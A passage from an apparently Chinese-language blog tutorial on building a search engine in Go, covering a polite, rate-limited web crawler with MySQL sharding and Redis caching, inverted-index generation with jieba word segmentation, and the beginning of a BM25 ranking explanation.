'上级页面ID', `scheme` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT 'http/https', `domain1` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '一级域名后缀', `domain2` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '二级域名后缀', `path` varchar(2000) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT 'URL 路径', `query` varchar(2000) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT 'URL 查询参数', `title` varchar(1000) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci DEFAULT NULL COMMENT '页面标题', `text` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci COMMENT '页面文字', `created_at` timestamp NOT NULL DEFAULT '2001-01-01 08:00:00' COMMENT '插入时间', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci; ``` #### 4. 给爷爬! 爬虫有一个极好的特性:自我增殖。每一个网页里,基本都带有其他网页的链接,这样我们就可以道生一,一生二,二生三,三生万物了。 此时,我们只需要找一个导航网站,手动把该网站的链接插入到数据库里,爬虫就可以开始运作了。各位可以自行挑选可口的页面链接服用。 我们正式进入实操阶段,以下都是可以运行的代码片段,代码逻辑在注释里面讲解。 我采用`joho/godotenv`来提供`.env`配置文件读取的能力,你需要提前准备好一个`.env`文件,并在里面填写好可以使用的 MySQL 数据库信息,具体可以参考项目中的`.env.example`文件。 ```go func main() { fmt.Println("My name id enterprise-search-engine!") // 加载 .env initENV() // 该函数的具体实现可以参考项目代码 // 开始爬 nextStep(time.Now()) // 阻塞,不跑爬虫时用于阻塞主线程 select {} } // 循环爬 func nextStep(startTime time.Time) { // 初始化 gorm 数据库 dsn0 := os.Getenv("DB_USERNAME0") + ":" + os.Getenv("DB_PASSWORD0") + "@(" + os.Getenv("DB_HOST0") + ":" + os.Getenv("DB_PORT0") + ")/" + os.Getenv("DB_DATABASE0") + "?charset=utf8mb4&parseTime=True&loc=Local" gormConfig := gorm.Config{} db0, _ := gorm.Open(mysql.Open(dsn0), &gormConfig) // 从数据库里取出本轮需要爬的 100 条 URL var pagesArray []models.Page db0.Table("pages"). Where("craw_done", 0). Order("id").Limit(100).Find(&pagesArray) tools.DD(pagesArray) // 打印结果 // 限于篇幅,下面用文字描述 1. 循环展开 pagesArray 2. 针对每一个 page,使用 curl 工具类获取网页文本 3. 解析网页文本,提取出标题和页面中含有的超链接 4. 将标题、一级域名后缀、URL 路径、插入时间等信息补充完全,更新到这一行数据上 5. 将页面上的超链接插入 pages 表,我们的网页库第一次扩充了! fmt.Println("跑完一轮", time.Now().Unix()-startTime.Unix(), "秒") nextStep(time.Now()) // 紧接着跑下一条 } ``` ![](https://qn.lvwenhan.com/2023-06-28-16878837968415.jpg) 我已经事先将 hao123 的链接插入了 pages 表,所以我运行`go build -o ese *.go && ./ese`命令之后,得到了如下信息: ```ruby My name id enterprise-search-engine! 加载.env : /root/enterprise-search-engine/.env APP_ENV: local [[{1 0 https://www.hao123.com 0 0 2001-01-01 00:00:00 +0800 CST 2001-01-01 08:00:00 +0800 CST 0001-01-01 00:00:00 +0000 UTC}]] ``` ![](https://qn.lvwenhan.com/2023-06-27-16877958190576.jpg) <center>《递龟》</center> 上面的代码中,我们第一次用到了~~递龟~~递归:自己调用自己。 #### 5. 合法合规:遵守 robots.txt 规范 我选择用`temoto/robotstxt`这个库来探查我们的爬虫是否被允许爬取某个 URL,使用一张单独的表来存储每个域名的 robots 规则,并在 Redis 中建立缓存,每次爬取 URL 之前,先进行一次匹配,匹配成功后再爬,保证合法合规。 ### 制造真正的生产级爬虫 ![怎样画马](https://qn.lvwenhan.com/2023-06-27-怎样画马.jpg) <center>《怎样画马》</center> 有了前面这个理论上可以运行的简单爬虫,下面我们就要给这匹马补充亿点细节了:生产环境中,爬虫性能优化是最重要的工作。 从某种程度上来说,搜索引擎的优劣并不取决于搜索算法的优劣,因为算法作为一种“特定问题的简便算法”,一家商业公司比别家强的程度很有限,搜索引擎的真正优劣在于哪家能够以最快的速度索引到互联网上层出不穷的新页面和已经更新过内容的旧页面,在于哪家能够识别哪个网页是价值最高的网页。 识别网页价值方面,李彦宏起家的搜索专利,以及谷歌大名鼎鼎的 PageRank 都拥有异曲同工之妙。但本文的重点不在这个领域,而在于技术实现。让我们回到爬虫性能优化,为什么性能优化如此重要呢?我们构建的是互联网搜索引擎,需要爬海量的数据,因此我们的爬虫需要足够高效:中文互联网有 400 万个网站,3500 亿个网页,哪怕只爬千分之一,3.5 亿个网页也不是开玩笑的,如果只是单线程阻塞地爬,消耗的时间恐怕要以年为单位了。 爬虫性能优化,我们首先需要规划一下硬件。 #### 硬件要求 首先计算磁盘空间,假设一个页面 20KB,在不进行压缩的情况下,一亿个页面就需要 `20 * 100000000 / 1024 / 1024 / 1024 = 1.86TB` 的磁盘空间,而我们打算使用 MySQL 来存储页面文本,需要的空间会更大一点。 我的爬虫花费了 2 个月的时间,爬到了大约 1 亿个 URL,其中 3600 万个爬到了页面的 HTML 文本存在了数据库里,共消耗了超过 600GB 的磁盘空间。 除了硬性的磁盘空间,剩下的就是尽量多的 CPU 核心数和内存了:CPU 拿来并发爬网页,内存拿来支撑海量协程的消耗,外加用 Redis 为爬虫提速。爬虫阶段对内存的要求还不大,但在后面第二步拆分字典的时候,大内存容量的 Redis 将成为提速利器。 所以,我们对硬件的需求是这样的:一台核心数尽量多的物理机拿来跑我们的 ese 二进制程序,外加高性能数据库(例如16核64GB内存,NVME磁盘),你能搞到多少台数据库就准备多少台,就算你搞到了 65536 台数据库,也能跑满,理论上我们可以无限分库分表。能这么搞是因为网页数据具有离散性,相互之间的关系在爬虫和字典阶段还不存在,在查询阶段才比较重要。 顺着这个思路,有人可能就会想,我用 KV 数据库例如 MongoDB 来存怎么样呢?当然是很好的,但是MongoDB 不适合干的事情实在是太多啦,所以你依然需要 Redis 和 MySQL 的支持,如果你需要爬取更大规模的网页,可以把 MongoDB 用起来,利用进一步推高系统复杂度的方式获得一个显著的性能提升。 下面我们开始进行软件优化,我只讲述关键步骤,各位有什么不明白的地方可以参考项目代码。 #### 重用 HTTP 客户端以防止内存泄露 这个点看起来很小,但当你瞬间并发数十万协程的时候,每个协程 1MB 的内存浪费累积起来都是巨大的,很容易造成 OOM。 我们在 tools 文件夹下创建`curl.go`工具类,专门用来存放[全局 client](https://req.cool/zh/docs/tutorial/best-practices/#%e9%87%8d%e7%94%a8-client) 和 curl 工具函数: ```go package tools import ... //省略,具体可以参考项目代码 // 全局重用 client 对象,4 秒超时,不跟随 301 302 跳转 var client = req.C().SetTimeout(time.Second * 4).SetRedirectPolicy(req.NoRedirectPolicy()) // 返回 document 对象和状态码 func Curl(page models.Page, ch chan int) (*goquery.Document, int) { ... //省略,具体可以参考项目代码 } ``` #### 基础知识储备:goroutine 协程 我默认你已经了解 go 协程是什么了,它就是一个看起来像魔法的东西。在这里我提供一个理解协程的小诀窍:每个协程在进入磁盘、网络等“只需要后台等待”的任务之后,会把当前 CPU 核心(可以理解成一个图灵机)的指令指针 goto 到下一个协程的起始。 需要注意的是,协程是一种特殊的并发形式,你在并发函数内调用的函数必须都支持并发调用,类似于传统的“线程安全”,如果你一不小心写了不安全的代码,轻则卡顿,重则 crash。 #### 一次取出一批需要爬的 URL,使用协程并发爬 协程代码实操来啦! ```go // tools.DD(pagesArray) // 打印结果 // 创建 channel 数组 chs := make([]chan int, len(pagesArray)) // 展开 pagesArray 数组 for k, v := range pagesArray { // 存储 channel 指针 chs[k] = make(chan int) // 阿瓦达啃大瓜!! go craw(v, chs[k], k) } // 注意,下面的代码不可省略,否则你上面 go 出来的那些协程会瞬间退出 var results = make(map[int]int) for _, ch := range chs { // 神之一手,收集来自协程的返回数据,并 hold 主线程不瞬间退出 r := <-ch _, prs := results[r] if prs { results[r] += 1 } else { results[r] = 1 } } // 当代码执行到这里的时候,说明所有的协程都已经返回数据了 fmt.Println("跑完一轮", time.Now().Unix()-startTime.Unix(), "秒") ``` `craw`函数协程化: ```go // 真的爬,存储标题,内容,以及子链接 func craw(status models.Page, ch chan int, index int) { // 调用 CURL 工具类爬到网页 doc, chVal := tools.Curl(status, ch) // 对 doc 的处理在这里省略 // 最重要的一步,向 chennel 发送 int 值,该动作是协程结束的标志 ch <- chVal return } ``` 协程优化做完了,CPU 被吃满了,接下来数据库要成为瓶颈了。 ### MySQL 性能优化 做到这里,在做普通业务逻辑的时候非常快的 MySQL 已经是整个系统中最慢的一环了:pages 表一天就要增加几百万行,MySQL 会以肉眼可见的速度慢下来。我们要对 MySQL 做性能优化。 #### 何以解忧,唯有索引 首先,收益最大的肯定是加索引,这句话适用于 99% 的场景。 在你磁盘容量够用的情况下,加索引通常可以获得数百倍到数万倍的性能提升。我们先给 url 加个索引,因为我们每爬到一个 URL 都要查一下它是否已经在表里面存在了,这个动作的频率是非常高的,如果我们最终爬到了一亿个页面,那这个对比动作至少会做百亿次。 #### 部分场景下很好用的分库分表 非常幸运,爬虫场景和分库分表非常契合:只要我们能根据 URL 将数据均匀地分散开,不同的 URL 之间是没有多少关系的。那我们该怎么将数据分散开呢?使用散列值! 每一个 URL 在 MD5 之后,都会得到一个形如`698d51a19d8a121ce581499d7b701668`的 32 位长度的 16 进制数。而这些数字在概率上是均等的,所以理论上我们可以将数亿个 URL 均匀分布在多个库的多个表里。下面问题来了,该怎么分呢? #### 只有一台数据库,应该分表吗? 如果你看过我的[《高并发的哲学原理(八)-- 将 InnoDB 剥的一丝不挂:B+ 树与 Buffer Pool 》](https://lvwenhan.com/tech-epic/506.html)的话,就会明白,只要你能接受分表的逻辑代价,那在任何大数据量场景下分表都是有明显收益的,因为随着表容量的增加,那棵 16KB 页块组成的 B+ 树的复杂度增加是超线性的,用牛逼的话说就是:二阶导数持续大于 0。此外,缓存也会失效,你的 MySQL 运行速度会降低到一个令人发指的水平。 所以,即便你只有一台数据库,那也应该分表。如果你的磁盘是 NVME,我觉得单机拿出 MD5 的前两位数字,分出来 16 x 16 = 256 个表是比较不错的。 当然,如果你能搞到 16 台数据库服务器,那拿出第一位 16 进制数字选定物理服务器,再用二三位数字给每台机器分 256 个表也是极好的。 #### 我的真实硬件和分表逻辑 由于我司比较节俭~~贫穷~~,机房的服务器都是二手的,实在是拿不出高性能的 NVME 服务器,于是我找 IT 借了两台 ThinkBook 14 寸笔记本装上了 CentOS Stream 9: 1. 把内存扩充到最大,形成了 8GB 板载 + 32GB 内存条一共 40GB 的奇葩配置 2. CPU 是 AMD Ryzen 5 5600U,虽然是低压版的 CPU,只有六核十二线程,但是也比 Intel 的渣渣 CPU 快多了(Intel:牙膏真的挤完了,一滴都没有了) 3. 磁盘就用自带的 500GB NVME,实测读写速度能跑到 3GB/2GB,十分够用 由于单台机器只有 6 核,我就各给他们分了 128 个表,在每次要执行 SQL 之前,我会先用 URL 作为参数获取一下它对应的数据库服务器和表名。表名获取逻辑如下: 1. 计算此 URL 的 MD5 散列值 2. 取前两位十六进制数字 3. 拼接成类似`pages_0f`样子的表名 ```go tableName := table + "_" + tools.GetMD5Hash(url)[0:2] ``` ### 爬虫数据流和架构优化 上面我们已经使用协程把 CPU 全部利用起来了,又使用分库分表技术把数据库硬件全部利用起来了,但是如果你这个时候直接用上面的代码开始跑,会发现速度还是不够快:因为某些工作 MySQL 还是不擅长做。 此时,我们就需要对数据流和架构做出优化了。 #### 拆分仓库表和状态表 原始的 pages 表有 16 个字段,在我们爬的过程中,只用得到五个:`id` `url` `host` `craw_done` `craw_time`。而看过我上面的 InnoDB 文章的小伙伴还知道,在页面 HTML 被填充进`text`字段之后,pages 表的 16KB 页块会出现频繁的调整和指针的乱飞,对 InnoDB 的“局部性”性能涡轮的施展非常不利,会造成 buffer pool 的频繁失效。 所以,为了爬的更快,为 pages 表打造一个性能更强的“影子”就十分重要。于是,我为`pages_0f`表打造了只包含上面五个字段的`status_0f`兄弟表,数据从 pages 表里面复制而来,承担一些频繁读写任务: 1. 检查 URL 是否已经在库,即如果以前别的页面上已经出现了这个 URL 了,本次就不需要再入库了 2. 找出下一批需要爬的页面,即`craw_done=0`的 URL 3. craw_time 承担日志的作用,用于统计过去一段时间的爬虫效率 除了这些高频操作,存储页面 HTML 和标题等信息的低频操作是可以直接入`paqes_0f`仓库表的。 #### 实时读取 URL 改为后台定时读取 随着单表数据量的逐渐提升,每一轮开始时从数据库里面批量读出需要爬的 URL 成了一个相对耗时的操作,即便每张表只需要 500ms,那轮询 256 张表总耗时也达到了 128 秒之多,这是无法接受的,所以这个流程也需要异步化。你问为什么不异步同时读取 256 张表?因为 MySQL 最宝贵的就是连接数,这样会让连接数直接爆掉,大家都别玩了,关于连接数我们下面还会有提及。 我们把流程调整一下:每 20 秒从 status 表中搜罗一批需要爬的 URL 放进 Redis 中积累起来,爬的时候直接从 Redis 中读一批。这么做是为了把每一秒的时间都利用起来,尽力填满协程爬虫的胃口。 ```go // 在 main() 中注册定时任务 c := cron.New(cron.WithSeconds()) // 每 20 秒执行一次 prepareStatusesBackground 函数 c.AddFunc("*/20 * * * * *", prepareStatusesBackground) go c.Start() // prepareStatusesBackground 函数中,使用 LPush 向有序列表的头部插入 URL for _, v := range _statusArray { taskBytes, _ := json.Marshal(v) db.Rdb.LPush(db.Ctx, "need_craw_list", taskBytes) } // 每一轮都使用 RPop 从有序列表的尾部读取需要爬的 URL var statusArr []models.Status maxNumber := 1 // 放大倍数,控制每一批的 URL 数量 for i := 0; i < 256*maxNumber; i++ { jsonString := db.Rdb.RPop(db.Ctx, "need_craw_list").Val() var _status models.Status err := json.Unmarshal([]byte(jsonString), &_status) if err != nil { continue } statusArr = append(statusArr, _status) } ``` #### 十分重要的爬虫压力管控 过去十年,中国互联网每次有搜索引擎新秀崛起,我都要被新爬虫 DDOS 一遍,想想就气。这帮大厂的菜鸟程序员,以为随便一个网站都能承受住 2000 QPS,实际上互联网上 99.9% 网站的极限 QPS 到不了 100,超过 10 都够呛。对了,如果有 YisouSpider 的人看到本文,请回去推动一下你们的爬虫优化,虽然你们的爬虫不会持续高速爬取,但是你们在每分钟的第一秒并发 10 个请求的方法更像是 DDOS,对系统的危害更大... 我们要像谷歌那样,做一个压力均匀的文明爬虫,这就需要我们把每一个域名的爬虫频率都记录下来,并实时进行调整。我基于 Redis 和每个 URL 的 host 做了一个计数器,在每次真的要爬某个 URL 之前,调用一次检测函数,看是否对单个域名的爬虫压力过大。 此外,由于我们的 craw 函数是协程调用的,此时 Redis 就显得更为重要了:它能提供宝贵的“线程安全数据读写”功能,如果你也是`sync.Map`的受害者,我相信你一定懂我😭 > #### 我认为,单线程的 Redis 是 go 协程最佳的伙伴,就像 PHP 和 MySQL 那样。 具体代码我就不放了,有需要的同学可以自己去看项目代码哦。 #### 疯狂使用 Redis 加速频繁重复的数据库调用 我们使用协程高速爬到数据了,下一步就是存储这些数据。这个操作看起来很简单,更新一下原来那一行,再插入 N 行新数据不就行了吗,其实不行,还有一个关键步骤需要使用 Redis 来加速:新爬到的 URL 是否已经在数据库里存在了。这个操作看起来简单,但在我们解决了上面这些性能问题以后,庞大的数量就成了这一步最大的问题,每一次查询会越来越慢,查询字数还特别多,这谁顶得住。 如果我们拿 Redis 来存 URL,岂不是需要把所有 URL 都存入 Redis 吗,这内存需求也太大了。这个时候,我们的老朋友,`局部性`又出现了:由于我们的爬虫是按照顺序爬的,那“朋友的朋友也是朋友”的概率是很大的,所以我们只要在 Redis 里记录一下某条 URL 是否存在,那之后一段时间,这个信息被查到的概率也很大: ```go // 我们使用一个 Hash 来存储 URL 是否存在的状态 statusHashMapKey := "ese_spider_status_exist" statusExist := db.Rdb.HExists(db.Ctx, statusHashMapKey, _url).Val() // 若 HashMap 中不存在,则查询或插入数据库 if !statusExist { ··· 代码省略,不存在则创建这行 page,存在则更新信息 ··· // 无论是否新插入了数据,都将 _url 入 HashMap db.Rdb.HSet(db.Ctx, statusHashMapKey, _url, 1).Err() } ``` 这段代码看似简单,实测非常好用,唯一的问题就是不能运行太长时间,隔一段时间得清空一次,因为随着时间的流逝,局部性会越来越差。 细心的小伙伴可能已经发现了,既然爬取状态已经用 Redis 来承载了,那还需要区分 pages 和 status 表吗?需要,因为 Redis 也不是全能的,它的基础数据依然是来自 MySQL 的。目前这个架构类似于复杂的三级火箭,看起来提升没那么大,但这小小的提速可能就能让你爬三亿个网页的时间从 3 个月缩减到 1 个月,是非常值的。 另外,如果通过扫描 256 张表中 craw_time 字段的方式来统计“过去 N 分钟爬了多少个 URL、有效页面多少个、因为爬虫压力而略过的页面多少个、网络错误的多少个、多次网络错误后不再重复爬取的多少个”的数据,还是太慢了,也太消耗资源了,这些统计信息也需要使用 Redis 来记录: ```go // 过去一分钟爬到了多少个页面的 HTML allStatusKey := "ese_spider_all_status_in_minute_" + strconv.Itoa(int(time.Now().Unix())/60) // 计数器加 1 db.Rdb.IncrBy(db.Ctx, allStatusKey, 1).Err() // 续命 1 小时 db.Rdb.Expire(db.Ctx, allStatusKey, time.Hour).Err() // 过去一分钟从新爬到的 HTML 里面提取出了多少个新的待爬 URL newStatusKey := "ese_spider_new_status_in_minute_" + strconv.Itoa(int(time.Now().Unix())/60) // 计数器加 1 db.Rdb.IncrBy(db.Ctx, newStatusKey, 1).Err() // 续命 1 小时 db.Rdb.Expire(db.Ctx, newStatusKey, time.Hour).Err() ``` ### 生产爬虫遇到的其他问题 在我们不断提高爬虫速度的过程中,爬虫的复杂度也在持续上升,我们会遇到玩具爬虫遇不到的很多问题,接下来我分享一下我的处理经验。 #### 抑制暴增的数据库连接数 在协程这个大杀器的协助之下,我们可以轻易写出超高并行的代码,把 CPU 全部吃完,但是,并行的协程多了以后,数据库的连接数压力也开始暴增。MySQL 默认的最大连接数只有 151,根据我的实际体验,哪怕是一个协程一个连接,我们这个爬虫也可以轻易把连接数干到数万,这个数字太大了,即便是最新的 CPU 加上 DDR5 内存,受制于 MySQL 算法的限制,在连接数达到这个级别以后,处理海量连接数所需要的时间也越来越多。这个情况和[《高并发的哲学原理(二)-- Apache 的性能瓶颈与 Nginx 的性能优势》](https://lvwenhan.com/tech-epic/500.html)一文中描述的 Apache 的 prefork 模式比较像。好消息是,最近版本的 MySQL 8 针对连接数匹配算法做了优化,大幅提升了大量连接数下的性能。 除了协程之外,分库分表对连接数的的暴增也负有不可推卸的责任。为了提升单条 SQL 的性能,我们给单台数据库服务器分了 256 张表,这种情况下,以前的一个连接+一条 SQL 的状态会突然增加到 256 个连接和 256 条 SQL,如果我们不加以限制的话,可以说协程+分表一启动,你就一定会收到海量的`Too many connections`报错。我的解决方法是,在 gorm 初始化的时候,给他设定一个“单线程最大连接数”: ```go dbdb0, _ := _db0.DB() dbdb0.SetMaxIdleConns(1) dbdb0.SetMaxOpenConns(100) dbdb0.SetConnMaxLifetime(time.Hour) ``` 根据我的经验,100 个够用了,再大的话,你的 TCP 端口就要不够用了。 #### 域名黑名单 我们都知道,内容农场是一种专门钻搜索引擎空子的垃圾内容生产者,爬虫很难判断哪些网站是内容农场,但是人一点进去就能判断出来。而这些域名的内部链接做的又特别好,这就导致我们需要手动给一些恶心的内容农场域名加黑名单。我们把爬到的每个域名下的 URL 数量统计一下,搞一个动态的排名,就能很容易发现头部的内容农场域名了。 #### 复杂的失败处理策略 > 生产代码和教学代码最大的区别就是成吨的错误处理!—— John·Lui(作者自己) 如果你真的要搞一个涵盖数亿页面的可以用的搜索引擎,你会碰到各种各样的奇葩失败,这些失败都需要拿出特别的处理策略,下面我分享一下我遇到过的问题和我的处理策略。 1. 单页面超时非常重要:如果你想尽可能地在一段时间内爬到尽量多的页面的话,缩短你 curl 的超时时间非常重要,经过摸索,我把这个时间设定到了 4 秒,既能爬到绝大多数网页,也不会浪费时间在一些根本就无法响应的 URL 上。 2. 单个 URL 错误达到一定数量以后,需要直接拉黑,不然一段时间后,你的爬虫整天就只爬那些被无数次爬取失败的 URL 上啦,一个新页面也爬不到。这个次数我设定的是 3 次。 3. 如果某个 URL 返回的 HTML 无法被解析,果断放弃,没必要花费额外资源重新爬。 4. 由于我们的数据流已经是三级火箭形态,所以在各种地方加上“动态锁”就很必要,因为很多时候我们需要手动让其他级火箭发动机暂停运行,手动检修某一级发动机。我一般拿 MySQL 来做这件事,创建一个名为`kvstores`的表,只有 key value 两个字段,需要的时候我会手动修改特定 key 对应的 value 值,让某一级发动机暂停一下。 5. 由于 curl 的结果具有不确定性,务必需要保证任何情况下,都要给 channel 返回信号量,不然你的整个应用会直接卡死。 6. 一个页面内经常会有同一个超链接重复出现,在内存里保存已经见过的 URL 并跳过重复值可以显著节约时间。 7. 我建了一个 MySQL 表来存储我手动插入的黑名单域名,这个非常好用,可以在爬虫持续运行的时候随时“止损”,停止对黑名单域名的新增爬取。 至此,我们的爬虫终于构建完成了。 ### 爬虫运行架构图 现在我们的爬虫运行架构图应该是下面这样的: ![whiteboard_exported_image](https://qn.lvwenhan.com/2023-07-06-whiteboard_exported_image.png) 爬虫搞完了,让我们进入第二大部分。 ## 第二步,使用倒排索引生成字典 那个~~男人~~一听就很牛逼的词出现了:倒排索引。 对于没搞过倒排索引的人来说,这个词听起来和“生态化反”一样牛逼,其实它非常简单,简单程度堪比 HTTP 协议。 ### 倒排索引到底是什么 下面这个例子可以解释倒排索引是个什么东西: 1. 我们有一个表 titles,含有两个字段,ID 和 text,假设这个表有 100 行数据,其中第一行 text 为“爬虫工作流程”,第二行为“制造真正的生产级爬虫” 2. 我们对这两行文本进行分词,第一行可以得到“爬虫”、“工作”、“流程”三个词,第二行可以得到“制造”、“真正的”、“生产级”、“爬虫”四个词 3. 我们把顺序颠倒过来,以词为 key,以①`titles.id` ②`,` ③`这个词在 text 中的位置` 这三个元素拼接在一起为一个`值`,不同 text 生成的`值`之间以 - 作为间隔,对数据进行“反向索引”,可以得到: 1. 爬虫: 1,0-2,8 2. 工作:1,2 3. 流程:1,4 4. 制造:2,0 5. 真正的:2,2 6. 生产级:2,5 倒排索引完成了!就是这么简单。说白了,就是把所有内容都分词出来,再反向给每个词标记出“他出现在哪个文本的哪个位置”,没了,就是这么简单。下面是我生成的字典中,“辰玺”这个词的字典值: ```text 110,85,1,195653,7101-66,111,1,195653,7101- ``` 你问为什么我不找个常见的词?因为随便一个常见的词,它的字典长度都是以 MB 为单位的,根本没法放出来... #### 还有一个牛逼的词,最小完美哈希,可以用来排布字典数据,加快搜索速度,感兴趣的同学可以自行学习 ### 生成倒排索引数据 理解了倒排索引是什么以后,我们就可以着手把我们爬到的 HTML 处理成倒排索引了。 我使用`yanyiwu/gojieba`这个库来调用结巴分词,按照以下步骤对我爬到的每一个 HTML 文本进行分词并归类: 1. 分词,然后循环处理这些词: 2. 统计词频:这个词在该 HTML 中出现的次数 3. 记录下这个词在该 HTML 中每一次出现的位置,从 0 开始算 4. 计算该 HTML 的总长度,搜索算法需要 5. 按照一定格式,组装成倒排索引值,形式如下: ```go // 分表的顺序,例如 0f 转为十进制为 15 strconv.Itoa(i) + "," + // pages.id 该 URL 的主键 ID strconv.Itoa(int(pages.ID)) + "," + // 词频:这个词在该 HTML 中出现的次数 strconv.Itoa(v.count) + "," + // 该 HTML 的总长度,BM25 算法需要 strconv.Itoa(textLength) + "," + // 这个词出现的每一个位置,用逗号隔开,可能有多个 strings.Join(v.positions, ",") + // 不同 page 之间的间隔符 "-" ``` 我们按照这个规则,把所有的 HTML 进行倒排索引,并且把生成的索引值拼接在一起,存入 MySQL 即可。 ### 使用协程 + Redis 大幅提升词典生成速度 不知道大家感受到了没有,词典的生成是一个比爬虫高几个数量级的 CPU 消耗大户,一个 HTML 动辄几千个词,如果你要对数亿个 HTML 进行倒排索引,需要的计算量是非常惊人的。我爬到了 3600 万个页面,但是只处理了不到 800 万个页面的倒排索引,因为我的计算资源也有限... 并且,把词典的内容存到 MySQL 里难度也很大,因为一些常见词的倒排索引会巨长,例如“没有”这个词,真的是到处都有它。那该怎么做性能优化呢?还是我们的老朋友,协程和 Redis。 #### 协程分词 两个 HTML 的分词工作之间完全没有交集,非常适合拿协程来跑。 但是,MySQL 举手了:我顶不住。所以协程的好朋友 Redis 也来了。 #### 使用 Redis 做为词典数据的中转站 我们在 Redis 中针对每一个词生成一个 List,把倒排出来的索引插入到尾部: ```go db.Rdb10.RPush(db.Ctx, word, appendSrting) ``` #### 使用协程从 Redis 搬运数据到 MySQL 中 你没看错,这个地方也需要使用协程,因为数据量实在是太大了,一个线程循环跑会非常慢。经过我的不断尝试,我发现每次转移 2000 个词,对 Redis 的负载比较能够接受,E5-V4 的 CPU 单核能够跑满,带宽大概 400Mbps。 从 Redis 到 MySQL 的高性能搬运方法如下: 1. 随机获取一个 key 2. 判断该 key 的长度,只有大于等于 2 的进入下一步 3. 把最后一个索引值留下,前面的元素一个一个`LPop`(弹出头部)出来,拼接在一起 4. 汇集一批 2000 个随机词的结果,append 到数据库该词现有索引值的后面 有了协程和 Redis 的协助,分词加倒排索引的速度快了起来,但是如果你选择一个词一个词地 append 值,你会发现 MySQL 又双叒叕变的超慢,又要优化 MySQL 了!🙊 ### 事务的妙用:MySQL 高速批量插入 由于需要往磁盘里写东西,所以只要是一个一个 update,怎么优化都会很慢,那有没有一次性 update 多行数据的方法呢?有!那就是事务: ```go tx.Exec(`START TRANSACTION`) // 需要批量执行的 update 语句 for w, s := range needUpdate { tx.Exec(`UPDATE word_dics SET positions = concat(ifnull(positions,''), ?) where name = ?`, s, w) } tx.Exec(`COMMIT`) ``` 这么操作,字典写入速度一下子起来了。但是,每次执行 2000 条 update 语句对磁盘的要求非常高,我进行这个操作的时候,可以把磁盘写入速度瞬间提升到 1.5GB/S,如果你的数据库存储不够快,可以减少语句数量。 ### 世界的参差:无意义的词 这个世界上的东西并不都是有用的,一个 HTML 中的字符也是如此。 首先,一般不建议索引整个 HTML,而是把他用 DOM 库处理一下,提取出文本内容,再进行索引。 其次,即便是你已经过滤掉了所有的 html 标签、css、js 代码等,还是有些词频繁地出现:它们出现的频率如此的高,以至于反而失去了作为搜索词的价值。这个时候,我们就需要把他们狠狠地拉黑,不处理他们的倒排索引。我使用的黑名单词如下,表名为`word_black_list`,只有两个字段 id、word,需要的自取: ```ruby INSERT INTO `word_black_list` (`id`, `word`) VALUES (1, 'px'), (2, '20'), (3, '('), (4, ')'), (5, ','), (6, '.'), (7, '-'), (8, '/'), (9, ':'), (10, 'var'), (11, '的'), (12, 'com'), (13, ';'), (14, '['), (15, ']'), (16, '{'), (17, '}'), (18, '\''), (19, '\"'), (20, '_'), (21, '?'), (22, 'function'), (23, 'document'), (24, '|'), (25, '='), (26, 'html'), (27, '内容'), (28, '0'), (29, '1'), (30, '3'), (31, 'https'), (32, 'http'), (33, '2'), (34, '!'), (35, 'window'), (36, 'if'), (37, '“'), (38, '”'), (39, '。'), (40, 'src'), (41, '中'), (42, '了'), (43, '6'), (44, '。'), (45, '<'), (46, '>'), (47, '联系'), (48, '号'), (49, 'getElementsByTagName'), (50, '5'), (51, '、'), (52, 'script'), (53, 'js'); ``` 至此,字典的处理告一段落,下面让我们一起 Just 搜 it! ## 第三步,使用 BM25 算法给出搜索结果 网上关于 BM25 算法的文章是不是看起来都有点懵?别担心,看完下面这段文字,我保证你能自己写出来这个算法的具体实现,这种有具体文档的工作是最好做的了,比前面的性能优化简单多了。 ### 简单介绍一下 BM25 算法 BM25 算法是现代搜索引擎的基础,它可以很好地反映一个词和一堆文本的相关性。它拥有不少独特的设计思想,我们下面会详细解释。 这个算法第一次被生产系统使用是在 1980 年代的伦敦城市大学,在一个名为 Okapi 的信息检索系统中被实现出来,而原型算法来自 1970 年代 Stephen E. Robertson、Karen Spärck Jones 和他们的同伴开发的概率检索框架。所以这个算法也叫 Okapi BM25,这里的 BM 代表的是`best matching`(最佳匹配),非常实在,和比亚迪的“美梦成真”有的一拼(Build Your Dreams)😂 ### 详细讲解 BM25 算法数学表达式的含义 ![](https://qn.lvwenhan.com/2023-06-30-16880554899557.jpg) 我简单描述一下这个算法的含义。 首先,假设我们有 100 个页面,并且已经对他们分词,并全部生成了倒排索引。此时,我们需要搜索这句话“BM25 算法的数学描述”,我们就需要按照以下步骤来计算: 1. 对“BM25 算法的数学描述”进行分词,得到“BM25”、“算法”、“的”、“数学”、“描述”五个词 2. 拿出这五个词的全部字典信息,假设包含这五个词的页面一共有 50 个 3. 逐个计算这五个词和这 50 个页面的`相关性权重`和`相关性得分`的乘积(当然,不是每个词都出现在了这 50 个网页中,有多少算多少) 4. 把这 50 页面的分数分别求和,再倒序排列,即可以获得“BM25 算法的数学描述”这句话在这 100 个页面中的搜索结果 `相关性权重`和`相关性得分`名字相似,别搞混了,它们的具体定义如下: #### 某个词和包含它的某个页面的“相关性权重” ![](https://qn.lvwenhan.com/2023-06-30-16880562026300.jpg) 上图中的`Wi`指代的就是相关性权重,最常用的是`TF-IDF`算法中的`IDF`权重计算法: ![](https://qn.lvwenhan.com/2023-06-30-16880562733047.jpg) 这里的 N 指的是页面总数,就是你已经加入字典的页面数量,需要动态扫描 MySQL 字典,对我来说就是 784 万。而`n(Qi)`就是这个词的字典长度,就是含有这个词的页面有多少个,就是我们字典值中`-`出现的次数。 这个参数的现实意义是:如果一个词在很多页面里面都出现了,那说明这个词不重要,例如百分百空手接白刃的“的”字,哪个页面都有,说明这个词不准确,进而它就不重要。 词以稀为贵。 我的代码实现如下: ```go // 页面总数 db.DbInstance0.Raw("select count(*) from pages_0f where dic_done = 1").Scan(&N) N *= 256 // 